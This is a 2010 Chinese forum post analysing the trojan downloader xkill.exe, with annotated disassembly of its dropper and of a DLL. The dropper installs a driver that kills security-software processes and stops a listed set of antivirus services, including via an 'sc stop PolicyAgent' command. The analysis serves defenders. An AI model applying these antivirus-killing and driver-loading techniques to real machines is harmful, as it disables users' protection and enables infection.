木马下载者Rootkit.xkill.exe分析
本帖最后由 qiang 于 2010-7-22 21:12 编辑
文件: C:\Documents and Settings\safe\桌面\xkill.exe
大小: 74240 字节
修改时间: 2010年7月16日, 17:59:33
MD5: 9C92126F79154C2B5E6409EDD52F7E17
SHA1: 64FC169486E217813E668A5584DD27DEA7500DDE
病毒xkill.exe分析:
(1)在%Systemroot%目录下生成两个XXXXXX(随机名).dll(下文反汇编注释中显示的实际生成路径为%SystemRoot%\system32\,例如whdjwx.dll)
A.dll大小为“59,392”字节,B.dll大小为“9,728”字节
然后调用rundll32分别运行两个dll导出的Execute函数.
(2)A.dll运行后在%ProgramFiles%\rav\处创建CDriver.sys和CDriver.inf(下文反汇编注释中该目录显示为Program Files\KAV\,以实际样本为准),然后加载该驱动.
并Hook SSDT 的ExCreateProcessEx,防止安全软件的运行.
然后遍历当前运行的进程,如果有安全软件进程,则发IRP杀之.
接着停止并删除掉以下安全软件的服务:
ZhuDongFangYu
360rp
RsRavMon
McNASvc
MpfService
McProxy
McShield
McODS
Mcmscsvc
McSysmon
Ekrn
PolicyAgent
并且查找进程中是否加载了以下模块,有则卸载:
Safemon.dll
RavExt.dll
最后删除掉CDriver.sys和CDriver.inf,unHook SSDT 的ExCreateProcessEx,退出。
(3)B.dll运行后,会连接网络下载病毒列表文件,根据列表内容下载病毒并运行。
00401940 x>/$ 55 push ebp ; (Initial CPU selection)
00401941 |. 8BEC mov ebp, esp
00401943 |. 81EC 20020000 sub esp, 220
00401949 |. 68 8A7F0000 push 7F8A ; /CursorID = OCR_APPSTARTING
0040194E |. 68 007F0000 push 7F00 ; |/RsrcName = IDC_ARROW
00401953 |. 6A 00 push 0 ; ||hInst = NULL
00401955 |. FF15 28204000 call dword ptr [<&USER32.LoadCursorA>; |\LoadCursorA
0040195B |. 50 push eax ; |/hIcon
0040195C |. FF15 20204000 call dword ptr [<&USER32.CopyIcon>] ; |\CopyIcon
00401962 |. 50 push eax ; |hCursor
00401963 |. FF15 24204000 call dword ptr [<&USER32.SetSystemCu>; \SetSystemCursor
00401969 |. E8 22FDFFFF call 00401690 //call 1
0040196E |. E8 0DF9FFFF call 00401280 //call 2
00401973 |. 68 04010000 push 104 ; /BufSize = 104 (260.)
00401978 |. 8D85 F0FDFFFF lea eax, ; |
0040197E |. 50 push eax ; |PathBuffer
0040197F |. 6A 00 push 0 ; |hModule = NULL
00401981 |. FF15 18204000 call dword ptr [<&KERNEL32.GetModule>; \GetModuleFileNameA
00401987 |. 68 04010000 push 104 ; /BufSize = 104 (260.)
0040198C |. 8D8D F8FEFFFF lea ecx, ; |
00401992 |. 51 push ecx ; |Buffer
00401993 |. FF15 00204000 call dword ptr [<&KERNEL32.GetSystem>; \GetSystemDirectoryA
00401999 |. C685 E0FDFFFF 5>mov byte ptr , 5C \
004019A0 |. C685 E1FDFFFF 5>mov byte ptr , 5C \
004019A7 |. C685 E2FDFFFF 7>mov byte ptr , 73 \\s
004019AE |. C685 E3FDFFFF 7>mov byte ptr , 79 \\y
004019B5 |. C685 E4FDFFFF 7>mov byte ptr , 73 \\s
004019BC |. C685 E5FDFFFF 7>mov byte ptr , 74 \\t
004019C3 |. C685 E6FDFFFF 6>mov byte ptr , 65 \\e
004019CA |. C685 E7FDFFFF 6>mov byte ptr , 6D \\m
004019D1 |. C685 E8FDFFFF 2>mov byte ptr , 2E \\.
004019D8 |. C685 E9FDFFFF 6>mov byte ptr , 65 \\e
004019DF |. C685 EAFDFFFF 7>mov byte ptr , 78 \\x
004019E6 |. C685 EBFDFFFF 6>mov byte ptr , 65 \\e
004019ED |. C685 ECFDFFFF 0>mov byte ptr , 0 \\
004019F4 |. 8D95 E0FDFFFF lea edx,
004019FA |. 52 push edx ; /StringToAdd
004019FB |. 8D85 F8FEFFFF lea eax, ; |
00401A01 |. 50 push eax ; |ConcatString
00401A02 |. FF15 04204000 call dword ptr [<&KERNEL32.lstrcatA>>; \lstrcatA//字符连接
00401A08 |. 6A 01 push 1 ; /Flags = REPLACE_EXISTING//标志位
00401A0A |. 8D8D F8FEFFFF lea ecx, ; |
00401A10 |. 51 push ecx ; |NewName
00401A11 |. 8D95 F0FDFFFF lea edx, ; |
00401A17 |. 52 push edx ; |ExistingName
00401A18 |. FF15 10204000 call dword ptr [<&KERNEL32.MoveFileE>; \MoveFileExA //将自身移动(重命名)到C:\WINDOWS\system32\\system.exe
00401A1E |. 6A 00 push 0 ; /ExitCode = 0
00401A20 \. FF15 0C204000 call dword ptr [<&KERNEL32.ExitProce>; \ExitProcess
进入call 1,作用:调用rundll32分别运行两个dll导出的Execute函数,所用API均为动态解析,字符串经过加密处理。call 2和call 1类似。
00401690 /$ 55 push ebp
00401691 |. 8BEC mov ebp, esp
00401693 |. 81EC C4020000 sub esp, 2C4
00401699 |. 68 81694C21 push 214C6981
0040169E |. E8 4DFBFFFF call <获取API地址函数> //动态解析所用API函数
004016A3 |. 83C4 04 add esp, 4
004016A6 |. 8945 E4 mov , eax
004016A9 |. 68 04010000 push 104
004016AE |. 8D85 48FDFFFF lea eax,
004016B4 |. 50 push eax
004016B5 |. FF55 E4 call ; kernel32.GetSystemDirectoryA
004016B8 |. 68 A08D361C push 1C368DA0
004016BD |. E8 2EFBFFFF call <获取API地址函数>
004016C2 |. 83C4 04 add esp, 4
004016C5 |. 8945 EC mov , eax
004016C8 |. FF55 EC call ; kernel32.GetTickCount
004016CB |. 50 push eax
004016CC |. 6A 00 push 0
004016CE |. 8D8D A8FEFFFF lea ecx,
004016D4 |. 51 push ecx
004016D5 |. E8 26F9FFFF call <获取随机数>
004016DA |. 83C4 0C add esp, 0C
004016DD |. C645 E8 5C mov byte ptr , 5C
004016E1 |. C645 E9 00 mov byte ptr , 0
004016E5 |. C685 BCFEFFFF 2>mov byte ptr , 2E
004016EC |. C685 BDFEFFFF 6>mov byte ptr , 64 ; //64对应字符d
004016F3 |. C685 BEFEFFFF 6>mov byte ptr , 6C ; //6C对应字符l
004016FA |. C685 BFFEFFFF 6>mov byte ptr , 6C ; //6C对应字符l
00401701 |. C685 C0FEFFFF 0>mov byte ptr , 0
00401708 |. 8D55 E8 lea edx,
0040170B |. 52 push edx
0040170C |. 8D85 48FDFFFF lea eax,
00401712 |. 50 push eax
00401713 |. E8 B8030000 call <字符处理函数> ; //这里处理出来C:\WINDOWS\system32\
00401718 |. 83C4 08 add esp, 8
0040171B |. 8D8D A8FEFFFF lea ecx,
00401721 |. 51 push ecx
00401722 |. 8D95 48FDFFFF lea edx,
00401728 |. 52 push edx
00401729 |. E8 A2030000 call <字符处理函数> ; //这里处理出来C:\WINDOWS\system32\whdjwx
0040172E |. 83C4 08 add esp, 8
00401731 |. 8D85 BCFEFFFF lea eax,
00401737 |. 50 push eax
00401738 |. 8D8D 48FDFFFF lea ecx,
0040173E |. 51 push ecx
0040173F |. E8 8C030000 call <字符处理函数> ; //这里处理出来C:\WINDOWS\system32\whdjwx.dll
00401744 |. 83C4 08 add esp, 8
00401747 |. 68 43081E4E push 4E1E0843
0040174C |. E8 9FFAFFFF call <获取API地址函数>
00401751 |. 83C4 04 add esp, 4
00401754 |. 8985 5CFEFFFF mov , eax
0040175A |. 6A 00 push 0
0040175C |. 68 80000000 push 80
00401761 |. 6A 02 push 2
00401763 |. 6A 00 push 0
00401765 |. 6A 00 push 0
00401767 |. 68 00000010 push 10000000
0040176C |. 8D95 48FDFFFF lea edx,
00401772 |. 52 push edx
00401773 |. FF95 5CFEFFFF call ; kernel32.CreateFileA,//创建whdjwx.dll文件,文件名随机
00401779 |. 8985 C4FEFFFF mov , eax
0040177F |. 83BD C4FEFFFF F>cmp , -1
00401786 |. 74 5D je short 004017E5
00401788 |. C785 44FDFFFF 0>mov , 0
00401792 |. 68 27A66374 push 7463A627
00401797 |. E8 54FAFFFF call <获取API地址函数>
0040179C |. 83C4 04 add esp, 4
0040179F |. 8985 3CFDFFFF mov , eax
004017A5 |. 6A 00 push 0
004017A7 |. 8D85 44FDFFFF lea eax,
004017AD |. 50 push eax
004017AE |. 68 00E80000 push 0E800
004017B3 |. 68 00304000 push 00403000
004017B8 |. 8B8D C4FEFFFF mov ecx,
004017BE |. 51 push ecx
004017BF |. FF95 3CFDFFFF call ; kernel32.WriteFile,//写文件
004017C5 |. 68 28FBEB70 push 70EBFB28
004017CA |. E8 21FAFFFF call <获取API地址函数>
004017CF |. 83C4 04 add esp, 4
004017D2 |. 8985 40FDFFFF mov , eax
004017D8 |. 8B95 C4FEFFFF mov edx,
004017DE |. 52 push edx
004017DF |. FF95 40FDFFFF call ; kernel32.CloseHandle,//关闭文件句柄
004017E5 |> C685 50FEFFFF 6>mov byte ptr , 60
004017EC |. C685 51FEFFFF 4>mov byte ptr , 47
004017F3 |. C685 52FEFFFF 5>mov byte ptr , 5C
004017FA |. C685 53FEFFFF 5>mov byte ptr , 56
00401801 |. C685 54FEFFFF 5>mov byte ptr , 5E
00401808 |. C685 55FEFFFF 5>mov byte ptr , 5E
0040180F |. C685 56FEFFFF 0>mov byte ptr , 1
00401816 |. C685 57FEFFFF 0>mov byte ptr , 0
0040181D |. C685 58FEFFFF 1>mov byte ptr , 12
00401824 |. C685 59FEFFFF 3>mov byte ptr , 32
0040182B |. 6A 32 push 32
0040182D |. 6A 0A push 0A
0040182F |. 8D85 50FEFFFF lea eax,
00401835 |. 50 push eax
00401836 |. 8D8D 50FEFFFF lea ecx,
0040183C |. 51 push ecx ; //解密字符长度
0040183D |. E8 FEF9FFFF call <字符解密函数> ; //`G\V^^.2经过解密出来是Rundll32 .
00401842 |. 83C4 10 add esp, 10
00401845 |. C645 F0 20 mov byte ptr , 20
00401849 |. C645 F1 45 mov byte ptr , 45
0040184D |. C645 F2 78 mov byte ptr , 78
00401851 |. C645 F3 75 mov byte ptr , 75
00401855 |. C645 F4 63 mov byte ptr , 63
00401859 |. C645 F5 75 mov byte ptr , 75
0040185D |. C645 F6 74 mov byte ptr , 74
00401861 |. C645 F7 65 mov byte ptr , 65
00401865 |. C645 F8 00 mov byte ptr , 0
00401869 |. 6A 44 push 44
0040186B |. 6A 00 push 0
0040186D |. 8D95 60FEFFFF lea edx, ; //把要解密的字符地址0012FD88存入edx
00401873 |. 52 push edx
00401874 |. E8 A7F9FFFF call 00401220
00401879 |. 83C4 0C add esp, 0C
0040187C |. C785 60FEFFFF 4>mov , 44
00401886 |. 6A 10 push 10
00401888 |. 6A 00 push 0
0040188A |. 8D85 C8FEFFFF lea eax,
00401890 |. 50 push eax
00401891 |. E8 8AF9FFFF call 00401220
00401896 |. 83C4 0C add esp, 0C
00401899 |. 8D4D F0 lea ecx,
0040189C |. 51 push ecx
0040189D |. 8D95 48FDFFFF lea edx,
004018A3 |. 52 push edx
004018A4 |. E8 27020000 call <字符处理函数> ; //C:\WINDOWS\system32\whdjwx.dll Exucute
004018A9 |. 83C4 08 add esp, 8
004018AC |. 8D85 50FEFFFF lea eax,
004018B2 |. 50 push eax
004018B3 |. 8D8D D8FEFFFF lea ecx,
004018B9 |. 51 push ecx
004018BA |. E8 01020000 call 00401AC0
004018BF |. 83C4 08 add esp, 8
004018C2 |. 8D95 48FDFFFF lea edx,
004018C8 |. 52 push edx
004018C9 |. 8D85 D8FEFFFF lea eax,
004018CF |. 50 push eax
004018D0 |. E8 FB010000 call <字符处理函数> ; //Rundll32 C:\WINDOWS\system32\whdjwx.dll Exucute
004018D5 |. 83C4 08 add esp, 8
004018D8 |. 8D8D 48FDFFFF lea ecx,
004018DE |. 51 push ecx
004018DF |. E8 4C010000 call 00401A30
004018E4 |. 83C4 04 add esp, 4
004018E7 |. 68 D621E600 push 0E621D6
004018EC |. E8 FFF8FFFF call <获取API地址函数>
004018F1 |. 83C4 04 add esp, 4
004018F4 |. 8945 FC mov , eax
004018F7 |. 8D95 C8FEFFFF lea edx,
004018FD |. 52 push edx
004018FE |. 8D85 60FEFFFF lea eax,
00401904 |. 50 push eax
00401905 |. 6A 00 push 0
00401907 |. 6A 00 push 0
00401909 |. 6A 00 push 0
0040190B |. 6A 00 push 0
0040190D |. 6A 00 push 0
0040190F |. 6A 00 push 0
00401911 |. 8D8D D8FEFFFF lea ecx,
00401917 |. 51 push ecx
00401918 |. 6A 00 push 0 ; 调用rundll32运行dll导出的Execute函数
0040191A |. FF55 FC call ; kernel32.CreateProcessA
0040191D |. 68 60EA0000 push 0EA60 ; /Timeout = 60000. ms
00401922 |. 8B95 CCFEFFFF mov edx, ; |
00401928 |. 52 push edx ; |hObject
00401929 |. FF15 14204000 call dword ptr [<&KERNEL32.Wait>; \WaitForSingleObject
0040192F |. 8BE5 mov esp, ebp
00401931 |. 5D pop ebp
00401932 \. C3 retn
A.dll:主要分析其导出的Execute函数,大小为“59,392”字节
10002AC0 t>/$ 55 push ebp
10002AC1 |. 8BEC mov ebp, esp
10002AC3 |. 51 push ecx
10002AC4 |. 6A 00 push 0 ; /pThreadId = NULL
10002AC6 |. 6A 00 push 0 ; |CreationFlags = 0
10002AC8 |. 6A 00 push 0 ; |pThreadParm = NULL
10002ACA |. 68 B02A0010 push 10002AB0 ; |ThreadFunction = tgret.10002AB0 //线程函数1
10002ACF |. 6A 00 push 0 ; |StackSize = 0
10002AD1 |. 6A 00 push 0 ; |pSecurity = NULL
10002AD3 |. FF15 60800010 call dword ptr [<&KERNEL32.CreateThr>; \CreateThread
10002AD9 |. 8945 FC mov , eax
10002ADC |. 6A FF push -1 ; /Timeout = INFINITE
10002ADE |. 8B45 FC mov eax, ; |
10002AE1 |. 50 push eax ; |hObject
10002AE2 |. FF15 18800010 call dword ptr [<&KERNEL32.WaitForSi>; \WaitForSingleObject //等待线程结束
10002AE8 |. 8B4D FC mov ecx,
10002AEB |. 51 push ecx ; /hObject
10002AEC |. FF15 54800010 call dword ptr [<&KERNEL32.CloseHand>; \CloseHandle
10002AF2 |. 33C0 xor eax, eax
10002AF4 |. 8BE5 mov esp, ebp
10002AF6 |. 5D pop ebp
10002AF7 \. C3 retn
//线程函数1
10002AB0 /. 55 push ebp
10002AB1 |. 8BEC mov ebp, esp
10002AB3 |. E8 28FCFFFF call 100026E0 //关键call 3,具体作用往里面跟吧
10002AB8 |. 33C0 xor eax, eax
10002ABA |. 5D pop ebp
10002ABB \. C2 0400 retn 4
进入关键call 3
100026E0 /$ 55 push ebp
100026E1 |. 8BEC mov ebp, esp
100026E3 |. 51 push ecx
100026E4 |. 6A 00 push 0 ; /pThreadId = NULL
100026E6 |. 6A 00 push 0 ; |CreationFlags = 0
100026E8 |. 6A 00 push 0 ; |pThreadParm = NULL
100026EA |. 68 F0210010 push 100021F0 ; |ThreadFunction = tgret.100021F0 //又创建了一个线程2
100026EF |. 6A 00 push 0 ; |StackSize = 0
100026F1 |. 6A 00 push 0 ; |pSecurity = NULL
100026F3 |. FF15 60800010 call dword ptr [<&KERNEL32.CreateThr>; \CreateThread
//线程函数2(以下为节选,自10002373起)
10002373 |. 68 04010000 push 104 ; /BufSize = 104 (260.)
10002378 |. 8D85 E8FDFFFF lea eax, ; |
1000237E |. 50 push eax ; |Buffer
1000237F |. FF15 24800010 call dword ptr [<&KERNEL32.GetSystem>; \GetSystemDirectoryA
10002385 |. C685 EBFDFFFF 0>mov byte ptr , 0
1000238C |. 8D8D 9CFDFFFF lea ecx,
10002392 |. 51 push ecx ; /StringToAdd
10002393 |. 8D95 E8FDFFFF lea edx, ; |
10002399 |. 52 push edx ; |ConcatString
1000239A |. FF15 28800010 call dword ptr [<&KERNEL32.lstrcatA>>; \lstrcatA
100023A0 |. 6A 00 push 0 ; /pSecurity = NULL
100023A2 |. 8D85 E8FDFFFF lea eax, ; |
100023A8 |. 50 push eax ; |Path
100023A9 |. FF15 2C800010 call dword ptr [<&KERNEL32.CreateDir>; \CreateDirectoryA
100023AF |. 8D8D E8FDFFFF lea ecx,
100023B5 |. 51 push ecx ; /String2
100023B6 |. 8D95 F0FEFFFF lea edx, ; |
100023BC |. 52 push edx ; |String1
100023BD |. FF15 64800010 call dword ptr [<&KERNEL32.lstrcpyA>>; \lstrcpyA
100023C3 |. 8D85 D0FDFFFF lea eax,
100023C9 |. 50 push eax ; /StringToAdd //这个地址保存的字符CDriver.sys
100023CA |. 8D8D F0FEFFFF lea ecx, ; |
100023D0 |. 51 push ecx ; |ConcatString //Program Files\\KAV\\
100023D1 |. FF15 28800010 call dword ptr [<&KERNEL32.lstrcatA>>; \lstrcatA //连接字符串
100023D7 |. 68 00330000 push 3300 ; /dwBytes = 3300 (13056.)//长度
100023DC |. 6A 00 push 0 ; |dwFlags = 0
100023DE |. FF15 1C800010 call dword ptr [<&KERNEL32.GetProces>; |[GetProcessHeap//用以获取调用过程的堆句柄
100023E4 |. 50 push eax ; |hHeap
100023E5 |. FF15 80800010 call dword ptr [<&KERNEL32.HeapAlloc>; \RtlAllocateHeap
100023EB |. 8945 FC mov , eax
100023EE |. 6A 7B push 7B
100023F0 |. 68 00330000 push 3300
100023F5 |. 8B55 FC mov edx,
100023F8 |. 52 push edx
100023F9 |. 68 20BB0010 push 1000BB20
100023FE |. E8 0D050000 call 10002910
10002403 |. 83C4 10 add esp, 10
10002406 |. 68 00330000 push 3300
1000240B |. 8B45 FC mov eax,
1000240E |. 50 push eax
1000240F |. 8D8D F0FEFFFF lea ecx,
10002415 |. 51 push ecx
10002416 |. E8 35060000 call 10002A50 //创建文件C:\Program Files\\KAV\\CDriver.sys
1000241B |. 83C4 0C add esp, 0C
1000241E |. 8B55 FC mov edx,
10002421 |. 52 push edx ; /pMemory
10002422 |. 6A 00 push 0 ; |Flags = 0
10002424 |. FF15 1C800010 call dword ptr [<&KERNEL32.GetProces>; |[GetProcessHeap
1000242A |. 50 push eax ; |hHeap
1000242B |. FF15 7C800010 call dword ptr [<&KERNEL32.HeapFree>>; \HeapFree//释放堆
10002431 |. 68 4D100000 push 104D ; /dwBytes = 104D (4173.)
10002436 |. 6A 00 push 0 ; |dwFlags = 0
10002438 |. FF15 1C800010 call dword ptr [<&KERNEL32.GetProces>; |[GetProcessHeap
1000243E |. 50 push eax ; |hHeap
1000243F |. FF15 80800010 call dword ptr [<&KERNEL32.HeapAlloc>; \RtlAllocateHeap
10002445 |. 8945 FC mov , eax
10002448 |. 6A 0B push 0B
1000244A |. 68 4D100000 push 104D
1000244F |. 8B45 FC mov eax,
10002452 |. 50 push eax
10002453 |. 68 20EE0010 push 1000EE20
10002458 |. E8 B3040000 call 10002910 //解密函数,解密出CDriver.Inf文件内容
1000245D |. 83C4 10 add esp, 10
10002460 |. 8D8D E8FDFFFF lea ecx,
10002466 |. 51 push ecx ; /String2
10002467 |. 8D95 70FCFFFF lea edx, ; |
1000246D |. 52 push edx ; |String1
1000246E |. FF15 64800010 call dword ptr [<&KERNEL32.lstrcpyA>>; \lstrcpyA
10002474 |. 8D85 DCFDFFFF lea eax,
1000247A |. 50 push eax ; /StringToAdd
1000247B |. 8D8D 70FCFFFF lea ecx, ; |
10002481 |. 51 push ecx ; |ConcatString
10002482 |. FF15 28800010 call dword ptr [<&KERNEL32.lstrcatA>>; \lstrcatA //字符处理
10002488 |. 68 4D100000 push 104D
1000248D |. 8B55 FC mov edx,
10002490 |. 52 push edx
10002491 |. 8D85 70FCFFFF lea eax,
10002497 |. 50 push eax
10002498 |. E8 B3050000 call 10002A50 //创建文件C:\Program Files\\KAV\\CDriver.Inf
1000249D |. 83C4 0C add esp, 0C
100024A0 |. 8B4D FC mov ecx,
100024A3 |. 51 push ecx ; /pMemory
100024A4 |. 6A 00 push 0 ; |Flags = 0
100024A6 |. FF15 1C800010 call dword ptr [<&KERNEL32.GetProces>; |[GetProcessHeap
100024AC |. 50 push eax ; |hHeap
100024AD |. FF15 7C800010 call dword ptr [<&KERNEL32.HeapFree>>; \HeapFree
100024B3 |. 8D95 C0FDFFFF lea edx,
100024B9 |. 52 push edx
100024BA |. 8D85 70FCFFFF lea eax,
100024C0 |. 50 push eax
100024C1 |. E8 1AEFFFFF call 100013E0 //关键call 4,安装一个设备驱动程序
100024C6 |. 83C4 08 add esp, 8
100024C9 |. E8 B2F3FFFF call 10001880 //关键call 5 ,然后遍历当前运行的进程,如果有安全软件进程,则发IRP杀之.
100024CE |. 8D8D 70FCFFFF lea ecx,
100024D4 |. 51 push ecx
100024D5 |. E8 F6F2FFFF call 100017D0 //卸载一个设备驱动程序
100024DA |. 83C4 04 add esp, 4
100024DD |. 8D95 F0FEFFFF lea edx,
100024E3 |. 52 push edx ; /FileName
100024E4 |. FF15 5C800010 call dword ptr [<&KERNEL32.DeleteFil>; \DeleteFileA //删除文件
100024EA |. 8D85 70FCFFFF lea eax,
100024F0 |. 50 push eax ; /FileName
100024F1 |. FF15 5C800010 call dword ptr [<&KERNEL32.DeleteFil>; \DeleteFileA
100024F7 |. 8D8D E8FDFFFF lea ecx,
100024FD |. 51 push ecx ; /Path
100024FE |. FF15 38800010 call dword ptr [<&KERNEL32.RemoveDir>; \RemoveDirectoryA
10002504 |. C685 90FDFFFF 6>mov byte ptr , 6F
1000250B |. C685 91FDFFFF 7>mov byte ptr , 70
10002512 |. C685 92FDFFFF 6>mov byte ptr , 65
10002519 |. C685 93FDFFFF 6>mov byte ptr , 6E
10002520 |. C685 94FDFFFF 0>mov byte ptr , 0
10002527 |. C685 CCFDFFFF 7>mov byte ptr , 73
1000252E |. C685 CDFDFFFF 6>mov byte ptr , 63
10002535 |. C685 CEFDFFFF 0>mov byte ptr , 0
1000253C |. C685 7CFDFFFF 7>mov byte ptr , 73
10002543 |. C685 7DFDFFFF 7>mov byte ptr , 74
1000254A |. C685 7EFDFFFF 6>mov byte ptr , 6F
10002551 |. C685 7FFDFFFF 7>mov byte ptr , 70
10002558 |. C685 80FDFFFF 2>mov byte ptr , 20
1000255F |. C685 81FDFFFF 5>mov byte ptr , 50
10002566 |. C685 82FDFFFF 6>mov byte ptr , 6F
1000256D |. C685 83FDFFFF 6>mov byte ptr , 6C
10002574 |. C685 84FDFFFF 6>mov byte ptr , 69
1000257B |. C685 85FDFFFF 6>mov byte ptr , 63
10002582 |. C685 86FDFFFF 7>mov byte ptr , 79
10002589 |. C685 87FDFFFF 4>mov byte ptr , 41
10002590 |. C685 88FDFFFF 6>mov byte ptr , 67
10002597 |. C685 89FDFFFF 6>mov byte ptr , 65
1000259E |. C685 8AFDFFFF 6>mov byte ptr , 6E
100025A5 |. C685 8BFDFFFF 7>mov byte ptr , 74
100025AC |. C685 8CFDFFFF 0>mov byte ptr , 0
100025B3 |. C685 B4FDFFFF 7>mov byte ptr , 73
100025BA |. C685 B5FDFFFF 6>mov byte ptr , 68
100025C1 |. C685 B6FDFFFF 6>mov byte ptr , 65
100025C8 |. C685 B7FDFFFF 6>mov byte ptr , 6C
100025CF |. C685 B8FDFFFF 6>mov byte ptr , 6C
100025D6 |. C685 B9FDFFFF 3>mov byte ptr , 33
100025DD |. C685 BAFDFFFF 3>mov byte ptr , 32
100025E4 |. C685 BBFDFFFF 2>mov byte ptr , 2E
100025EB |. C685 BCFDFFFF 6>mov byte ptr , 64
100025F2 |. C685 BDFDFFFF 6>mov byte ptr , 6C
100025F9 |. C685 BEFDFFFF 6>mov byte ptr , 6C
10002600 |. C685 BFFDFFFF 0>mov byte ptr , 0
10002607 |. 8D95 B4FDFFFF lea edx,
1000260D |. 52 push edx ; /pModule
1000260E |. FF15 4C800010 call dword ptr [<&KERNEL32.GetModule>; \GetModuleHandleA
10002614 |. 8985 98FDFFFF mov , eax
1000261A |. 83BD 98FDFFFF 0>cmp , 0
10002621 |. 75 13 jnz short 10002636
10002623 |. 8D85 B4FDFFFF lea eax,
10002629 |. 50 push eax ; /FileName
1000262A |. FF15 3C800010 call dword ptr [<&KERNEL32.LoadLibra>; \LoadLibraryA
10002630 |. 8985 98FDFFFF mov , eax
10002636 |> C685 60FCFFFF 5>mov byte ptr , 53
1000263D |. C685 61FCFFFF 6>mov byte ptr , 68
10002644 |. C685 62FCFFFF 6>mov byte ptr , 65
1000264B |. C685 63FCFFFF 6>mov byte ptr , 6C
10002652 |. C685 64FCFFFF 6>mov byte ptr , 6C
10002659 |. C685 65FCFFFF 4>mov byte ptr , 45
10002660 |. C685 66FCFFFF 7>mov byte ptr , 78
10002667 |. C685 67FCFFFF 6>mov byte ptr , 65
1000266E |. C685 68FCFFFF 6>mov byte ptr , 63
10002675 |. C685 69FCFFFF 7>mov byte ptr , 75
1000267C |. C685 6AFCFFFF 7>mov byte ptr , 74
10002683 |. C685 6BFCFFFF 6>mov byte ptr , 65
1000268A |. C685 6CFCFFFF 4>mov byte ptr , 41
10002691 |. C685 6DFCFFFF 0>mov byte ptr , 0
10002698 |. 8D8D 60FCFFFF lea ecx,
1000269E |. 51 push ecx ; /ProcNameOrOrdinal
1000269F |. 8B95 98FDFFFF mov edx, ; |
100026A5 |. 52 push edx ; |hModule
100026A6 |. FF15 34800010 call dword ptr [<&KERNEL32.GetProcAd>; \GetProcAddress
100026AC |. 8945 F8 mov , eax
100026AF |. 6A 00 push 0
100026B1 |. 6A 00 push 0
100026B3 |. 8D85 7CFDFFFF lea eax,
100026B9 |. 50 push eax //"stop PolicyAgent"
100026BA |. 8D8D CCFDFFFF lea ecx,
100026C0 |. 51 push ecx //sc
100026C1 |. 8D95 90FDFFFF lea edx,
100026C7 |. 52 push edx
100026C8 |. 6A 00 push 0
100026CA |. FF55 F8 call // shell32.ShellExecuteA ,关闭PolicyAgent
100026CD |. 33C0 xor eax, eax
100026CF |. 8BE5 mov esp, ebp
100026D1 |. 5D pop ebp
100026D2 \. C2 0400 retn 4
关键call 4,安装一个设备驱动程序
100013E0 /$ 55 push ebp
100013E1 |. 8BEC mov ebp, esp
100013E3 |. 81EC 80000000 sub esp, 80
100013E9 |. 8B45 0C mov eax,
100013EC |. 50 push eax
100013ED |. E8 0EFCFFFF call 10001000
100013F2 |. 83C4 04 add esp, 4
100013F5 |. 0FB6C8 movzx ecx, al
100013F8 |. 85C9 test ecx, ecx
100013FA |. 0F85 AC000000 jnz 100014AC
10001400 |. 6A 00 push 0
10001402 |. 6A 14 push 14
10001404 |. 8D55 80 lea edx,
10001407 |. 52 push edx
10001408 |. 8D45 B4 lea eax,
1000140B |. 50 push eax
1000140C |. 8B4D 08 mov ecx,
1000140F |. 51 push ecx
10001410 |. FF15 58810010 call dword ptr [<&SETUPAPI.SetupDiGe>; setupapi.SetupDiGetINFClassA //获取GUID
10001416 |. 6A 00 push 0
10001418 |. 6A 00 push 0
1000141A |. 6A 00 push 0
1000141C |. 8D55 B4 lea edx,
1000141F |. 52 push edx
10001420 |. FF15 6C810010 call dword ptr [<&SETUPAPI.SetupDiCr>; setupapi.SetupDiCreateDeviceInfoListExA//创建设备信息块函数
10001426 |. 8945 F8 mov , eax
10001429 |. 837D F8 FF cmp , -1
1000142D |. 75 07 jnz short 10001436
1000142F |. 32C0 xor al, al
10001431 |. E9 8D010000 jmp 100015C3
10001436 |> C745 94 1C00000>mov , 1C
1000143D |. 8D45 94 lea eax,
10001440 |. 50 push eax
10001441 |. 6A 01 push 1
10001443 |. 6A 00 push 0
10001445 |. 6A 00 push 0
10001447 |. 8D4D B4 lea ecx,
1000144A |. 51 push ecx
1000144B |. 8D55 80 lea edx,
1000144E |. 52 push edx
1000144F |. 8B45 F8 mov eax,
10001452 |. 50 push eax
10001453 |. FF15 68810010 call dword ptr [<&SETUPAPI.SetupDiCr>; setupapi.SetupDiCreateDeviceInfoA//创建设备信息块
10001459 |. 85C0 test eax, eax
1000145B |. 75 07 jnz short 10001464
1000145D |. 32C0 xor al, al
1000145F |. E9 5F010000 jmp 100015C3
10001464 |> 8B4D 0C mov ecx,
10001467 |. 51 push ecx ; /String= //"*CDriver"
10001468 |. FF15 84800010 call dword ptr [<&KERNEL32.lstrlenA>>; \lstrlenA
1000146E |. 83C0 02 add eax, 2
10001471 |. 50 push eax
10001472 |. 8B55 0C mov edx,
10001475 |. 52 push edx
10001476 |. 6A 01 push 1
10001478 |. 8D45 94 lea eax,
1000147B |. 50 push eax
1000147C |. 8B4D F8 mov ecx,
1000147F |. 51 push ecx
10001480 |. FF15 74810010 call dword ptr [<&SETUPAPI.SetupDiSe>; setupapi.SetupDiSetDeviceRegistryPropertyA//设置设备在系统设备树上的路径
10001486 |. 85C0 test eax, eax
10001488 |. 75 07 jnz short 10001491
1000148A |. 32C0 xor al, al
1000148C |. E9 32010000 jmp 100015C3
10001491 |> 8D55 94 lea edx,
10001494 |. 52 push edx
10001495 |. 8B45 F8 mov eax,
10001498 |. 50 push eax
10001499 |. 6A 19 push 19
1000149B |. FF15 70810010 call dword ptr [<&SETUPAPI.SetupDiCa>; setupapi.SetupDiCallClassInstaller//注册
100014A1 |. 85C0 test eax, eax
100014A3 |. 75 07 jnz short 100014AC
100014A5 |. 32C0 xor al, al
100014A7 |. E9 17010000 jmp 100015C3
100014AC |> C745 FC 0000000>mov , 0
100014B3 |. C645 C4 6E mov byte ptr , 6E
100014B7 |. C645 C5 65 mov byte ptr , 65
100014BB |. C645 C6 77 mov byte ptr , 77
100014BF |. C645 C7 64 mov byte ptr , 64
100014C3 |. C645 C8 65 mov byte ptr , 65
100014C7 |. C645 C9 76 mov byte ptr , 76
100014CB |. C645 CA 2E mov byte ptr , 2E
100014CF |. C645 CB 64 mov byte ptr , 64
100014D3 |. C645 CC 6C mov byte ptr , 6C
100014D7 |. C645 CD 6C mov byte ptr , 6C
100014DB |. C645 CE 00 mov byte ptr , 0//newdev.dll
100014DF |. 8D4D C4 lea ecx,
100014E2 |. 51 push ecx ; /pModule
100014E3 |. FF15 4C800010 call dword ptr [<&KERNEL32.GetModule>; \GetModuleHandleA
100014E9 |. 8945 D0 mov , eax
100014EC |. 837D D0 00 cmp , 0
